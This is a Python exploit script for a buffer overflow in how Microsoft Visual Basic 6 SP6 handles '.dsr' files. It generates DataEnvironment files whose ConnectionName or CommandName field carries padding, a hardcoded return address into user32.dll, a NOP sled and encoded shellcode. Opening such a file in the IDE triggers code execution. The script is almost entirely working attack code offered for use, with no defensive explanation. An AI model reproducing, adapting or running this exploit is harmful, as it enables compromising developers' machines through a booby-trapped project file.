#usage: exploit.py import time print "---------------------------------------------------------------------------" print ' MS Visual Basic Enterprise Ed. 6 SP6 ".dsr" File Handling Buffer Overflow\n' print " author: shinnai" print " mail: shinnai[at]autistici[dot]org" print " site: http://shinnai.altervista.org\n" print " Once you create the file, open it with Visual Basic 6 and click on" print " connection or command name." print "---------------------------------------------------------------------------" EIP = "\xFF\xBE\x3F\x7E" #call ESP from user32.dll nop = "\x90\x90\x90\x90" shellcode = \ "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"+\ "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"+\ "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"+\ "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"+\ "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34"+\ "\x42\x50\x42\x30\x42\x50\x4b\x38\x45\x44\x4e\x43\x4b\x38\x4e\x47"+\ "\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x48\x4f\x54\x4a\x41\x4b\x38"+\ "\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x48\x46\x33\x4b\x48"+\ "\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c"+\ "\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e"+\ "\x46\x4f\x4b\x43\x46\x35\x46\x52\x46\x30\x45\x37\x45\x4e\x4b\x58"+\ "\x4f\x45\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x48\x4e\x30\x4b\x44"+\ "\x4b\x48\x4f\x35\x4e\x41\x41\x30\x4b\x4e\x4b\x38\x4e\x51\x4b\x38"+\ "\x41\x50\x4b\x4e\x49\x38\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33"+\ "\x42\x4c\x46\x46\x4b\x48\x42\x34\x42\x33\x45\x38\x42\x4c\x4a\x47"+\ "\x4e\x30\x4b\x38\x42\x34\x4e\x50\x4b\x58\x42\x47\x4e\x41\x4d\x4a"+\ "\x4b\x58\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x48\x42\x48\x42\x4b"+\ "\x42\x30\x42\x50\x42\x30\x4b\x38\x4a\x56\x4e\x43\x4f\x55\x41\x33"+\ "\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x37"+\ "\x42\x55\x4a\x36\x42\x4f\x4c\x58\x46\x50\x4f\x35\x4a\x36\x4a\x59"+\ "\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x56\x41\x56"+\ "\x4e\x46\x43\x56\x50\x32\x45\x46\x4a\x37\x45\x36\x42\x50\x5a" try: choice = int(raw_input('Choose 1 for "ConnectionName", 2 for "CommandName" bof or '+\ '3 to quit:\n==> ')) if choice == 1: buff = 'Connection1' + " " * 559 + EIP + "A" * 12 + nop + shellcode + nop try: vb_dsr = \ 'VERSION 5.00\n'+\ 'Begin {C0E45035-5775-11D0-B388-00A0C9055D8E} DataEnvironment1\n'+\ ' ClientHeight = 6315\n'+\ ' ClientLeft = 0'+\ ' ClientTop = 0\n'+\ ' ClientWidth = 7935\n'+\ ' _ExtentX = 13996\n'+\ ' _ExtentY = 11139\n'+\ ' FolderFlags = 1\n'+\ ' TypeInfoCookie = 0\n'+\ ' Version = 4\n'+\ ' NumConnections = 1\n'+\ ' BeginProperty Connection1\n'+\ ' ConnectionName = "' + buff + '"\n'+\ ' ConnDispId = 1001\n'+\ ' SourceOfData = 3\n'+\ ' QuoteChar = 34\n'+\ ' SeparatorChar = 46\n'+\ ' EndProperty\n'+\ ' NumRecordsets = 0\n'+\ 'End' + "\x0D\x0A" #"\x0D\x0A" ==> EOF out_file = open('ConnectionName.dsr','w') out_file.write(vb_dsr) out_file.close() print "FILE CREATED!" except: print "Something wrong in file creation!" if choice == 2: buff = 'Command1' + " " * 566 + EIP + "A" * 12 + nop + shellcode + nop try: vb_dsr = \ 'VERSION 5.00\n'+\ 'Begin {C0E45035-5775-11D0-B388-00A0C9055D8E} DataEnvironment1\n'+\ ' ClientHeight = 6315\n'+\ ' ClientLeft = 0'+\ ' ClientTop = 0\n'+\ ' ClientWidth = 7935\n'+\ ' _ExtentX = 13996\n'+\ ' _ExtentY = 11139\n'+\ ' FolderFlags = 1\n'+\ ' TypeInfoCookie = 0\n'+\ ' Version = 4\n'+\ ' NumConnections = 1\n'+\ ' BeginProperty Connection1\n'+\ ' ConnectionName = "Connection1"\n'+\ ' ConnDispId = 1001\n'+\ ' SourceOfData = 3\n'+\ ' QuoteChar = 34\n'+\ ' SeparatorChar = 46\n'+\ ' EndProperty\n'+\ ' NumRecordsets = 1\n'+\ ' BeginProperty Recordset1\n'+\ ' CommandName = "' + buff + '"\n'+\ ' CommDispId = 1002\n'+\ ' RsDispId = -1\n'+\ ' ActiveConnectionName= "Connection1"\n'+\ ' NumFields = 0\n'+\ ' NumGroups = 0\n'+\ ' ParamCount = 0\n'+\ ' RelationCount = 0\n'+\ ' AggregateCount = 0\n'+\ ' EndProperty\n'+\ 'End' + "\x0D\x0A" #"\x0D\x0A" ==> EOF out_file = open('CommandName.dsr','w') out_file.write(vb_dsr) out_file.close() print "FILE CREATED!" except: print "Something wrong in file creation!" if choice == 3: print "Be safe!" if choice !=1 and choice != 2 and choice != 3: print "D'oh! You MUST choose a value between 1 and 3" except: print "mmm... ok, you want it..." time.sleep(4) print "London Bridge is falling down,\nFalling down, falling down\nLondon Bridge is falling down\nMy fair lady" * 99999